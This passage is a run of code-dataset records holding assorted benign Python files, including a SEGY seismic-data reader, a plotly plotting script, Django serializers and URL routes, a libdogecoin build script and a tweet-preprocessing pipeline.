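# restatement_with_tag() returns a (sentence, per-word node-type tags) pair;\n # a plain sentence without table names is also available via root.restatement(with_table=False)\n 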
print(restatement)\n","repo_name":"microsoft/ContextualSP","sub_path":"interactive_text_to_sql/src/utils/semql_tree_util.py","file_name":"semql_tree_util.py","file_ext":"py","file_size_in_byte":13838,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"75054635893","text":"m = int(input())\n\nfor j in range(m):\n\tn = int(input())\n\tmaxLen = 0\n\tstartIndex = 0\n\ts = {}\n\n\tfor i in range(n):\n\t\tnewNum = int(input())\n\t\tlastIndex = s.get(newNum)\n\t\ts[newNum] = i\n\t\tif lastIndex is not None and (lastIndex >= startIndex):\n\t\t\t#print(f\"Duplicate of {newNum} found\")\n\t\t\tstartIndex = lastIndex+1\n\t\tmaxLen = max(maxLen,i-startIndex+1)\n\t\t#print(f\"last occ was {lastIndex}, current max is {maxLen}\")\n\tprint(maxLen)\n","repo_name":"jolitti/codingdei","sub_path":"old/snowflakes.py","file_name":"snowflakes.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21511876594","text":"\ncluster_cache_dir = \"/mnt/ds3lab-scratch/dslab2019/shghosh/preprocessed\" #Cache dir on cluster\nlocal_cache_dir = \"./preprocessed\" #Cache dir -- local\n\ncluster_base_dir = \"/mnt/ds3lab-scratch/bhendj/data\"\nlocal_base_dir = \".\"\n\noriginal_obs_x_highres = 253\noriginal_obs_y_highres = 375\n\nappended_obs_x_highres = 256\nappended_obs_y_highres = 384\n\noriginal_obs_x_lowres = 127\noriginal_obs_y_lowres = 188\n\nappended_obs_x_lowres = 128\nappended_obs_y_lowres = 192\n\noriginal_pred_x = 127\noriginal_pred_y = 188\n\nappended_pred_x = 128\nappended_pred_y = 192\n","repo_name":"butoialexandra/Realistic-looking-rainfall-forecasts","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"13705563845","text":"# -*- coding: utf-8 -*-\nimport segyio\nimport math\nimport numpy as np \n#read information of seismic data\n###############################################################################\n\ndef getSEGYInformation(filename):\n print(\"### Get Datafile Information:\")\n print(\" Data file --> [%s]\"%(filename))\n \n mTrace = 0\n nTrace = 0\n nSample = 0\n startT = 0\n deltaT = 0\n sortCode = 0\n formatFlag = 0\n \n with segyio.open(filename,\"r\",ignore_geometry = True) as f:\n f.mmap()\n mTrace = f.tracecount\n nTrace = f.bin[segyio.BinField.Traces]\n nSample = f.bin[segyio.BinField.Samples]\n deltaT = f.bin[segyio.BinField.Interval]\n sortCode = f.bin[segyio.BinField.SortingCode]\n formatFlag = f.bin[segyio.BinField.Format]\n f.close()\n \n return (mTrace,nTrace,nSample,startT,deltaT,sortCode,formatFlag)\n#End of getSEGYInformation\n\n#read Seismic Data\n###############################################################################\ndef readSEGYData(filename):\n print(\"### Reading SEGY-formatted Seismic Data:\")\n print(\" Data file --> [%s]\" % (filename))\n \n nTrace = 0\n nSample = 0\n startT = 0\n deltaT = 0\n \n with segyio.open(filename,\"r\",ignore_geometry = True) as f:\n f.mmap()\n nTrace = f.tracecount\n nSample = f.bin[segyio.BinField.Samples]\n deltaT = f.bin[segyio.BinField.Interval]\n \n print(\"### Number of Trace = %d\" %(nTrace))\n print(\"### Number of Samples = %d\" %(nSample))\n print(\"### Start Sample = %d\" %(startT))\n print(\"### Sampling Rate = %d\" %(deltaT))\n \n print(\"====================================\")\n print(\" Trace X-coord Y-coord\")\n 
print(\"====================================\")\n for i in range(0,nTrace,math.floor(nTrace/10)):\n id = f.header[i][segyio.TraceField.TRACE_SEQUENCE_LINE]\n x = f.header[i][segyio.TraceField.GroupX]\n y = f.header[i][segyio.TraceField.GroupY]\n print(\" %8d%12.2f%12.2f\"%(id,x,y))\n print(\"====================================\")\n \n mySeis = np.zeros((nTrace,nSample),dtype = np.float32)\n for i in range(nTrace):\n for j in range(nSample):\n mySeis[i][j] = f.trace[i][j]\n f.close()\n \n return (mySeis)\n#End of readSEGYData","repo_name":"cicyby/SEGY_Reader","sub_path":"kernel/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33601199274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.QtWidgets import QWidget, QHBoxLayout, QSplitter\n\nfrom componment.left_frame import LeftFrame\nfrom componment.middle_frame import MiddleFrame\nfrom componment.right_frame import RightFrame\nfrom tools.config import GlobalContext, Const\n\n\nclass LmrManager(QWidget):\n\n def __init__(self):\n super(LmrManager, self).__init__()\n\n self.h_layout = QHBoxLayout()\n\n self.left_frame = LeftFrame()\n\n self.middle_frame = MiddleFrame()\n self.right_frame = RightFrame()\n\n self.mr_splitter = QSplitter()\n\n # 缩小三个框直接的缝隙\n self.mr_splitter.setHandleWidth(1)\n\n self.mr_splitter.insertWidget(0, self.middle_frame)\n self.mr_splitter.insertWidget(1, self.right_frame)\n\n self.mr_splitter.setStretchFactor(0, 1) # 全屏后保持1:4的比例,但是之前设置的最小宽度此时可能就比较小了\n self.mr_splitter.setStretchFactor(1, 4)\n\n # 设置为不可拖动至隐藏\n self.mr_splitter.setCollapsible(0, False)\n self.mr_splitter.setCollapsible(1, False)\n\n self.h_layout.addWidget(self.left_frame)\n self.h_layout.addWidget(self.mr_splitter)\n\n self.setLayout(self.h_layout)\n\n","repo_name":"pleuvoir/like-me-learn","sub_path":"componment/lmr_mgr.py","file_name":"lmr_mgr.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41413790576","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 1 17:03:23 2019\n\n@author: instalador\n\"\"\"\nimport numpy as np\nimport plotly.graph_objects as go\n\nfrom plotly.subplots import make_subplots\n\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\nfrom matplotlib import cm\nfrom collections import OrderedDict\n\n\ndef Reverse_ColorBar(Bar_input):\n Bar_output = np.zeros(Bar_input.shape)\n for k in range(Bar_input.shape[0]):\n Bar_output[k,:] = Bar_input[Bar_input.shape[0]-1-k,:] \n return Bar_output\n\n\n#------------------------------------------------------------------------------\ndef ColorMap():\n cmp_list = [ 'viridis','Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',\n 'YlOrBr' , 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',\n 'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']\n c_map = cm.get_cmap(cmp_list[0]+'', 256) # ''= normal, '_r' = reversed\n color_BAR = c_map(np.linspace(0, 1, 64))\n \n matlab = 'inicial' #-----------el de Matlab---------------\n matlab = 'new'\n if matlab == 'inicial': \n color_BAR_r = Reverse_ColorBar(color_BAR)\n c_map = ListedColormap(color_BAR_r) \n return c_map,color_BAR,\n#------------------------------------------------------------------------------\ndef barra_RGB(color_BAR):\n# 'rgb(0.9553 , 0.901065, 0.118128)'\n color_BAR_RGB = []\n for color in color_BAR:\n color_RGB = 
'rgb('+str(color[0])+','+str(color[1])+','+str(color[2])+')'\n color_BAR_RGB.append(color_RGB)\n \n return color_BAR_RGB\n \n#------------------------------------------------------------------------------\ndef plot_ColorBar(dib,RGB_bar,Vref):\n D = Vref/64\n d = D/2\n \n for k in range(64):\n p_x = 1\n p_y = k*D+d\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-d,y0=p_y-d,x1=p_x+d,y1=p_y+d,\n line=dict(color=RGB_bar[k]),\n fillcolor=RGB_bar[k]),secondary_y=True,row=1, col=2)\n dib.update_xaxes(range=[0.5, 1], showgrid=False,title_text=\"\",showticklabels=False, row=1, col=2)\n# dib.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis left2 title\" ,secondary_y=False, row=1, col=2)\n dib.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis right2 title\" ,secondary_y=True, row=1, col=2)\n \n return\n#------------------------------------------------------------------------------\ndef add_text(dib,texto,x0,y0,color):\n dib.add_trace(go.Scatter(x=x0,y=y0,text=texto, mode=\"text\",orientation ='v',textposition=\"bottom center\",\n# textfont=dict(family=\"sans serif\", size=18, color=color )\n ), row=1, col=1)\n return\n#------------------------------------------------------------------------------\ndef add_patch(dib,p_x,p_y, color):\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n line=dict(color=color), fillcolor=color), row=1, col=1 )\n return\n#------------------------------------------------------------------------------\ndef add_polygon(dib,x_points,y_points,color):\n camino = 'M' \n for index,k in enumerate(x_points):\n camino = camino + ' '+ str(x_points[index]) +','+str(y_points[index])\n if index < np.size(x_points)-1:\n camino = camino + ' L'\n camino = camino + ' Z'\n print(camino)\n \n dib.add_shape(go.layout.Shape(type=\"path\",path=camino,fillcolor=color),line_color=color, row=1, col=1)\n \n \n return\n#------------------------------------------------------------------------------\n \nc_mapa,color_barra = ColorMap()\nRGB_bar = barra_RGB(color_barra) # to generate in rgb(0.267004,0.004874,0.329415)\n\n\n\n\nfig = make_subplots(rows=1, cols=2, column_widths=[10, 0.5], subplot_titles=(\"Plot 1\", \"\"),specs=[[{\"secondary_y\": False}, {\"secondary_y\": True}]] )\n\n\n\n\n\n#fig.add_shape(go.layout.Shape(type=\"path\",path=\" M 4,4 L 1,8 L 3,9 L3,8 L4,6 L4,5 Z\",fillcolor=RGB_bar[0]),line_color=RGB_bar[0], row=1, col=1)\n#fig.update_layout(shapes=[go.layout.Shape (type=\"path\",path=\" M 4,4 L 1,8 L 3,9 L3,8 L4,6 L4,5 Z\",fillcolor=RGB_bar[0],line_color=RGB_bar[0], row=1, col=1) ])\n\n\n\nVref = 155\nplot_ColorBar(fig,RGB_bar,Vref)\n#------------------Create the colorbar-------------------------------------\n#D = Vref/64\n#d = D/2\n#\n##fig.add_trace(\n## go.Scatter(x=[2, 3, 4], y=[4, 5, 6], name=\"yaxis2 data\"),\n## secondary_y=True,)\n#\n#for k in range(64):\n# p_x = 1\n# p_y = k*D+d\n# fig.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-d,y0=p_y-d,x1=p_x+d,y1=p_y+d,\n# line=dict(color=RGB_bar[k]),\n# fillcolor=RGB_bar[k]),row=1, col=2)\n#fig.update_xaxes(range=[0.5, 1], showgrid=False,title_text=\"xaxis 2 title\",showticklabels=False, row=1, col=2)\n#fig.update_yaxes(range=[0, Vref], showgrid=False ,title_text=\"yaxis 2 title\" , row=1, col=2)\n#------------------------------------------------------------------------------\n#fig.add_trace(go.Scatter(x=[20, 30, 40], y=[50, 60, 70]),\n# row=1, col=2)\n\n\n\n\np_x = 2\np_y = 2\n#fig.add_shape(go.layout.Shape(type=\"path\",path=\" M 1,1 L 3,1 L 2,2 
Z\",fillcolor=RGB_bar[30]),line_color=RGB_bar[30], row=1, col=1)\n\n#fig.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n# line=dict(color='red'), fillcolor='red'), row=1, col=1 )\n\n\n\n\n#fig.add_trace(go.Scatter(x=[2],y=[2],text=[\"Unfilled Rectangle\"], mode=\"text\",orientation ='v',textposition=\"bottom center\",\n# textfont=dict(\n# family=\"sans serif\",\n# size=18,\n# color=\"LightSeaGreen\"\n# )), row=1, col=1)\n\n\nadd_polygon(fig,[4.3,2,3,4],[1,2.45,3,4],RGB_bar[60])\nadd_patch(fig,p_x,p_y,'red')\nadd_text(fig,'orlando',[5],[5],'black')\n\nfig.update_xaxes(range=[0, 10], showgrid=True,title_text=\"secondary yaxis title xaxis 1 title\", gridwidth=1, gridcolor='LightPink', row=1, col=1)\nfig.update_yaxes(range=[0, 10], showgrid=True,title_text=\"yaxis 1 title\", gridwidth=1, gridcolor='LightPink', row=1, col=1)\n#fig.update_yaxes(title_text=\"secondary yaxis title\", secondary_y=True)\n\n\n\n\nfig.show()","repo_name":"orlando68/Stanford","sub_path":"subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11467163737","text":"from setuptools import setup, Extension, Command\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\n \nlibdoge_extension = [Extension(\n name= \"libdogecoin\",\n language= \"c\",\n sources= [\"wrappers/python/libdogecoin/libdogecoin.pyx\"],\n include_dirs= [\".\",\n \"include\",\n \"include/dogecoin\",\n \"secp256k1/include\"],\n libraries = [\"event\", \"event_core\", \"pthread\", \"m\"],\n extra_objects= [\".libs/libdogecoin.a\", \n \"src/secp256k1/.libs/libsecp256k1.a\", \n \"src/secp256k1/.libs/libsecp256k1_precomputed.a\"]\n)]\n\nsetup(\n name= \"libdogecoin\",\n version= \"0.1\", \n author= \"Jackie McAninch\",\n author_email= \"jackie.mcaninch.2019@gmail.com\",\n description= \"Python interface for the libdogecoin C library\",\n license= \"MIT\",\n url= \"https://github.com/dogecoinfoundation/libdogecoin\",\n cmdclass = {'build_ext': build_ext},\n ext_modules= cythonize(libdoge_extension, language_level = \"3\")\n)\n","repo_name":"michilumin/libdogecoin","sub_path":"wrappers/python/libdogecoin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"17810538904","text":"import re\nimport os\nimport sys\nfrom textblob import TextBlob\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom wordsegment import load, segment\nfrom autocorrect import Speller\n\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH+'/..')\n\nimport src.preprocessing.dictionaries as dictionaries\nimport src.paths as paths\n\nstopwords = set(stopwords.words('english'))\nspell = Speller(lang='en')\n\n# OTHER VALUES\nPOS_LABEL = '+1'\nNEG_LABEL = '-1'\n\n\ndef preprocess():\n \"\"\"\n Perform preprocessing on the positive, negative, and test tweet set, then concatenate into one tweet set.\n \"\"\"\n preprocess_pos()\n preprocess_neg()\n\n remove_indices_test()\n preprocess_test()\n\n # Concatenate the proprocessed versions of positive tweets and negative tweets into a new file\n concat_files([paths.POS_LABELS, paths.NEG_LABELS], paths.TRAIN)\n # Remove the tweets that appear >= 2 times and separate label from tweet.\n remove_both_duplicate_tweets(paths.TRAIN, paths.TRAIN_UNIQUE, 
paths.TRAIN_CONCAT_LABEL_UNIQUE)\n\n\ndef preprocess_pos():\n \"\"\"\n Perform preprocessing by removing duplicate tweets, preprocessing spaces, hashtags, contracted words, smileys\n and numbers on the positive tweet set.\n \"\"\"\n print('Pre-processing positive tweets...')\n\n in_filename = remove_duplicate_tweets(paths.POS, paths.POS_UNIQUE)\n in_filename = spaces(in_filename, paths.POS_SPACES)\n in_filename = hashtags(in_filename, paths.POS_HASHTAGS)\n in_filename = contractions(in_filename, paths.POS_CONTRACT)\n in_filename = smileys(in_filename, paths.POS_SMILEYS)\n in_filename = numbers(in_filename, paths.POS_PREPROCESSED)\n in_filename = add_label(in_filename, paths.POS_LABELS, POS_LABEL)\n\n\ndef preprocess_neg():\n \"\"\"\n Perform preprocessing by removing duplicate tweets, preprocessing spaces, hashtags, contracted words, smileys\n and numbers on the negative tweet set.\n \"\"\"\n print('Pre-processing negative tweets...')\n in_filename = remove_duplicate_tweets(paths.NEG, paths.NEG_UNIQUE)\n in_filename = spaces(in_filename, paths.NEG_SPACES)\n in_filename = hashtags(in_filename, paths.NEG_HASHTAGS)\n in_filename = contractions(in_filename, paths.NEG_CONTRACT)\n in_filename = smileys(in_filename, paths.NEG_SMILEYS)\n in_filename = numbers(in_filename, paths.NEG_PREPROCESSED)\n in_filename = add_label(in_filename, paths.NEG_LABELS, NEG_LABEL)\n\n\ndef preprocess_test():\n \"\"\"\n Perform preprocessing by preprocessing spaces, hashtags, contracted words, smileys\n and numbers on the test set.\n \"\"\"\n print('Pre-processing the test set...')\n in_filename = spaces(paths.TEST_WITHOUT_INDICES, paths.TEST_SPACES)\n in_filename = hashtags(in_filename, paths.TEST_HASHTAGS)\n in_filename = contractions(in_filename, paths.TEST_CONTRACT)\n in_filename = smileys(in_filename, paths.TEST_SMILEYS)\n in_filename = numbers(in_filename, paths.TEST_PREPROCESSED)\n\n\ndef remove_indices_test():\n \"\"\"\n Remove the index label from each tweet in the test set.\n \"\"\"\n test_file = open(paths.TEST, 'r')\n test_file_without_i = open(paths.TEST_WITHOUT_INDICES, 'w+')\n tweets_with_indices = [tweet for tweet in test_file]\n for i in range(len(tweets_with_indices)):\n size_to_remove = len(str(i+1))+1\n test_file_without_i.write(tweets_with_indices[i][size_to_remove:])\n test_file.close()\n test_file_without_i.close()\n\n\ndef remove_duplicate_tweets(tweets_path, out_file_path):\n \"\"\"\n Remove duplicated tweets from the given file.\n :param tweets_path: path to the file that contains tweets with duplicates\n :param out_file_path: path to the file that contains tweets without duplicates.\n :return: path to the file for the set of tweets without duplicates.\n \"\"\"\n print('\\tRemoving duplicate tweets...')\n lines_seen = set()\n outfile = open(out_file_path, \"w+\")\n for line in open(tweets_path, \"r\"):\n if line not in lines_seen:\n outfile.write(line)\n lines_seen.add(line)\n outfile.close()\n print('\\t\\tRemove duplicates ok.')\n return out_file_path\n\n\ndef remove_both_duplicate_tweets(tweets_path, out_filename, out_label_filename):\n \"\"\"\n Remove tweets that appear in both the positive and the negative tweet set.\n :param tweets_path: path to the file that contains positive and negative tweets\n :param out_filename: path to the file that contains tweets without duplicates\n :param out_label_filename: path to the file that contains labels to corresponding tweets in out_filename.\n \"\"\"\n print('Removing both duplicates...')\n line_to_occ = {}\n\n # Populate the dictionary with tweets and 
occurrences\n    for line in open(tweets_path, \"r\"):\n        tweet = line[2:]\n        label = line[:2]\n        if tweet in line_to_occ:\n            t = list(line_to_occ[tweet])\n            t[0] += 1\n            t = tuple(t)\n            line_to_occ[tweet] = t\n        else:\n            line_to_occ[tweet] = (1, label)\n\n    # Write the remaining tweets in the output file\n    outfile = open(out_filename, \"w+\")\n    out_label_file = open(out_label_filename, 'w+')\n    for tweet in line_to_occ.keys():\n        if line_to_occ[tweet][0] < 2:\n            outfile.write(tweet)\n            out_label_file.write((line_to_occ[tweet][1]))\n            out_label_file.write('\\n')\n\n    outfile.close()\n    out_label_file.close()\n    print('\\tRemove both ok.')\n\n\ndef spaces(tweets_path, out_filename):\n    \"\"\"\n    Preprocess spaces by replacing multiple spaces with a single one.\n    :param tweets_path: path to the file that contains tweets.\n    :param out_filename: path to the file that contains tweets with processed spaces.\n    :return: path to the processed file.\n    \"\"\"\n    print('\\tHandling spaces...')\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        outfile.write(re.sub(' +', ' ', tweet))\n    outfile.close()\n    print('\\t\\tSpaces ok.')\n    return out_filename\n\n\ndef hashtags(tweets_path, out_filename):\n    \"\"\"\n    Segment the expressions that follow hashtags.\n    :param tweets_path: path to the file that contains tweets.\n    :param out_filename: path to the file that contains hashtag expressions preprocessed.\n    :return: path to the file that contains hashtag expressions preprocessed.\n    \"\"\"\n    print('\\tHandling hashtags...')\n    load()\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        new_tweet = []\n        list_of_words = tweet.split(' ')\n        for i in range(len(list_of_words)):\n            word = list_of_words[i]\n            if word[0] == '#':\n                for w in segment(word[1:]):\n                    new_tweet.append(w)\n                if i == len(list_of_words) - 1:\n                    new_tweet.append('\\n')\n            else:\n                new_tweet.append(word)\n        tweet_str = []\n        for i in range(len(new_tweet)):\n            tweet_str.append(str(new_tweet[i]))\n            if i != len(new_tweet) - 1:\n                tweet_str.append(' ')\n        outfile.write(''.join(tweet_str))\n    outfile.close()\n    print('\\t\\tHashtags ok.')\n    return out_filename\n\n\ndef autocorrect(tweets_path, out_filename):\n    \"\"\"\n    Autocorrect words in the given tweet set\n    :param tweets_path: path to the file that contains the tweet set\n    :param out_filename: path to the file that contains tweets with autocorrected words.\n    :return: path to the file that contains tweets with autocorrected words.\n    \"\"\"\n    print('\\tAuto-correcting tweets...')\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        outfile.write(' '.join([spell(w) for w in tweet.split()]))\n    outfile.close()\n    print('\\t\\tAuto-correct ok.')\n    return out_filename\n\n\ndef contractions(tweets_path, out_filename):\n    \"\"\"\n    Handle contracted expressions by replacing them with their expanded versions.\n    :param tweets_path: path to the file that contains the tweet set\n    :param out_filename: path to the file that contains tweets with expanded contractions.\n    :return: path to the file that contains tweets with expanded contractions.\n    \"\"\"\n    print('\\tHandling contractions...')\n    outfile = open(out_filename, \"w+\")\n    contractions = dictionaries.load_dict_contractions()\n    for tweet in open(tweets_path, \"r\"):\n        tweet_list = tweet.split()\n        tweet_list_new = []\n        for word in tweet_list:\n            if word in contractions.keys():\n                tweet_list_new.append(contractions[word])\n            else:\n                tweet_list_new.append(word)\n        outfile.write(' '.join(tweet_list_new))\n        
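# one expanded tweet per line in the output file\n        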
outfile.write('\\n')\n    outfile.close()\n    print('\\t\\tContractions ok.')\n    return out_filename\n\n\ndef smileys(tweets_path, out_filename):\n    \"\"\"\n    Change any smiley into \"smiley\".\n    :param tweets_path: path to the file that contains the tweet set with smileys.\n    :param out_filename: path to the file that contains tweets with smileys replaced.\n    :return: path to the file that contains tweets with smileys replaced.\n    \"\"\"\n    print('\\tHandling smileys...')\n    outfile = open(out_filename, \"w+\")\n    smileys = dictionaries.load_dict_smileys()\n    for tweet in open(tweets_path, \"r\"):\n        tweet_list = tweet.split()\n        tweet_list_new = []\n        for word in tweet_list:\n            if word in smileys.keys():\n                tweet_list_new.append(smileys[word])\n            else:\n                tweet_list_new.append(word)\n        outfile.write(' '.join(tweet_list_new))\n        outfile.write('\\n')\n    outfile.close()\n    print('\\t\\tSmileys ok.')\n    return out_filename\n\n\ndef numbers(tweets_path, out_filename):\n    \"\"\"\n    Change any numbers into \n    :param tweets_path: path to the file that contains the tweet set.\n    :param out_filename: path to the file with any numbers replaced by \n    :return: path to the file with tweets where any numbers replaced by \n    \"\"\"\n    print('\\tHandling numbers...')\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        outfile.write(re.sub('[-+]?\\d*\\.\\d+|\\d+', '', tweet))\n    outfile.close()\n    print('\\t\\tNumbers ok.')\n    return out_filename\n\n\ndef remove_hooks(tweets_path, out_filename):\n    \"\"\"\n    Remove hooks.\n    :param tweets_path: path to the file that contains the tweet set.\n    :param out_filename: path to the file with tweets where hooks are removed.\n    :return: path to the file with tweets where hooks are removed.\n    \"\"\"\n    print('\\tRemoving hooks...')\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        outfile.write(re.sub(' *<.*?> *', '', tweet))\n    outfile.close()\n    print('\\t\\tHooks ok.')\n    return out_filename\n\n\ndef punctuation(tweets_path, out_filename):\n    \"\"\"\n    Remove any punctuation such as !, ?, -, ., ...\n    :param tweets_path: path to the file that contains the tweet set.\n    :param out_filename: path to the file that contains tweets without punctuation.\n    :return: path to the file that contains tweets without punctuation.\n    \"\"\"\n    print('\\tHandling punctuation...')\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        tweet_blob = TextBlob(tweet)\n        outfile.write(' '.join(tweet_blob.words))\n        outfile.write('\\n')\n    outfile.close()\n    print('\\t\\tPunctuation ok.')\n    return out_filename\n\n\n# TODO: CHANGE THIS, stopwords contain negative words\ndef stopw(tweets_path, out_filename):\n    \"\"\"\n    Remove words that are considered stopwords by the NLTK library.\n    :param tweets_path: path to the file that contains the tweet set.\n    :param out_filename: path to the file that contains the tweet set without stopwords.\n    :return: path to the file that contains the tweet set without stopwords.\n    \"\"\"\n    outfile = open(out_filename, \"w+\")\n    for tweet in open(tweets_path, \"r\"):\n        tweet_list = tweet.split()\n        clean_tokens = [t for t in tweet_list if re.match(r'[^\\W\\d]*$', t)]\n        clean_s = ' '.join(clean_tokens)\n        clean_mess = [word for word in clean_s.split() if word.lower() not in stopwords]\n        outfile.write(' '.join(clean_mess))\n        outfile.write('\\n')\n    outfile.close()\n    print('\\t\\tStopwords ok.')\n    return out_filename\n\n\ndef normalization(tweets_path, out_filename):\n    \"\"\"\n    Normalise given tweet set.\n    :param tweets_path: path to the file that contains tweet set.\n    :param out_filename: path to the file that contains normalized tweet set.\n    :return: path to the file that contains the normalized tweet set.\n    \"\"\"\n    outfile = open(out_filename, \"w+\")\n    for 
tweet in open(tweets_path, \"r\"):\n lem = WordNetLemmatizer()\n normalized_tweet = []\n tweet_list = tweet.split()\n for word in tweet_list:\n normalized_text = lem.lemmatize(word, 'v')\n normalized_tweet.append(normalized_text)\n outfile.write(' '.join(normalized_tweet))\n outfile.write('\\n')\n outfile.close()\n print('\\t\\tNormalization ok.')\n return out_filename\n\n\ndef add_label(tweets_path, out_filename, label_value):\n \"\"\"\n Add label value next to each tweet in given tweet set.\n :param in_filename: path to the file that contains the tweet set\n :param out_filename: path to the file that contains the tweets set to which a label is added.\n :param label_value: Corresponding label value the to tweet set.\n :return: path to the file that contains the tweets set to which a label is added.\n \"\"\"\n outfile = open(out_filename, 'w+')\n for line in open(tweets_path, 'r'):\n outfile.write(label_value)\n outfile.write(line)\n outfile.close()\n return out_filename\n\n\ndef concat_files(in_filenames, out_filename):\n \"\"\"\n Concat both positive tweet set and negative tweet set.\n :param in_filenames: paths to the files that need to be merged\n :param out_filename: path to the file that merged two tweet sets\n \"\"\"\n print('Concatenating positive and negative files...')\n with open(out_filename, 'w+') as outfile:\n for filename in in_filenames:\n with open(filename) as infile:\n for line in infile:\n outfile.write(line)\n print('\\tConcatenation ok.')\n\n\nif __name__ == '__main__':\n preprocess()","repo_name":"rayandaod/Twitter-sentiment-analysis","sub_path":"src/preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":14121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74006554611","text":"from django.db import transaction\nfrom drf_base64.fields import Base64ImageField\nfrom rest_framework import serializers\n\nfrom guides.fields.foldfilefield import FoldFileField\nfrom guides.fold import Fold\nfrom guides.models import Guide\nfrom guides.tasks import process_guide\n\n\nclass GuideReadSerializer(serializers.ModelSerializer):\n solved = serializers.SerializerMethodField()\n liked = serializers.SerializerMethodField()\n owner_username = serializers.CharField(source='owner.username', required=False)\n\n class Meta:\n model = Guide\n read_only_fields = [\n 'owner',\n 'published_at',\n 'animation_file',\n 'steps',\n 'status',\n 'owner_username',\n ]\n fields = [\n 'id',\n 'owner',\n 'name',\n 'published_at',\n 'steps',\n 'guide_file',\n 'thumbnail_file',\n 'animation_file',\n 'status',\n 'private',\n 'solved',\n 'liked',\n 'owner_username',\n ]\n\n def get_solved(self, obj):\n user = self.context['request'].user\n return obj.solved_by.filter(id=user.id).exists()\n\n def get_liked(self, obj):\n user = self.context['request'].user\n return obj.liked_by.filter(id=user.id).exists()\n\n\nclass GuideWriteSerializer(GuideReadSerializer):\n guide_file = FoldFileField()\n name = serializers.CharField(required=False)\n thumbnail_file = Base64ImageField(required=False)\n\n @transaction.atomic\n def create(self, validated_data):\n fold = Fold.from_fold_file(validated_data['guide_file'])\n guide = Guide.objects.create(**validated_data, name=fold.title, steps=fold.steps)\n transaction.on_commit(lambda: process_guide.delay(guide.pk))\n return guide\n\n @transaction.atomic\n def update(self, instance, validated_data):\n if validated_data.get('guide_file') is not None:\n fold = 
Fold.from_fold_file(validated_data['guide_file'])\n            validated_data['name'] = fold.title\n            validated_data['steps'] = fold.steps\n            transaction.on_commit(lambda: process_guide.delay(instance.pk))\n\n        return super(GuideWriteSerializer, self).update(instance, validated_data)\n","repo_name":"maciekmm/origami","sub_path":"backend/community/guides/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37219434971","text":"class Solution:\n    def eliminateMaximum(self, dist: 'List[int]', speed: 'List[int]') -> int:\n        ceiling = lambda x : int(x) + (1 if int(x)!=x else 0)\n        arrive = sorted([ceiling(a/b) for a, b in zip(dist, speed)])\n        time = 0\n        while arrive: #keep shooting one monster per minute, until a monster arrives that cannot be eliminated before the current time.\n            if time < arrive[0]:\n                time+=1\n                arrive.pop(0)\n            else:\n                return len(dist) - len(arrive) #total - left = eliminated\n        return len(dist)\n\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1921.py","file_name":"1921.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"6745449775","text":"from django.contrib import admin\nfrom django.urls import path, include # new\nfrom ser import views\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('accounts/', include('django.contrib.auth.urls')), # new\n    path('req/',views.req,name=\"req \"),\n    path('shop/',views.shop,name=\"shop \"),\n    path('email/',views.serv_mail,name=\"email\"),\n    path('list/',views.MyView,name=\"list\"),\n    path('show/',views.Myreqview,name=\"show\"),\n    path('gmail/',views.shopmail,name=\"gmail\"),\n    path('',include('signin.urls')),\n    path('',include('blog.urls')),\n    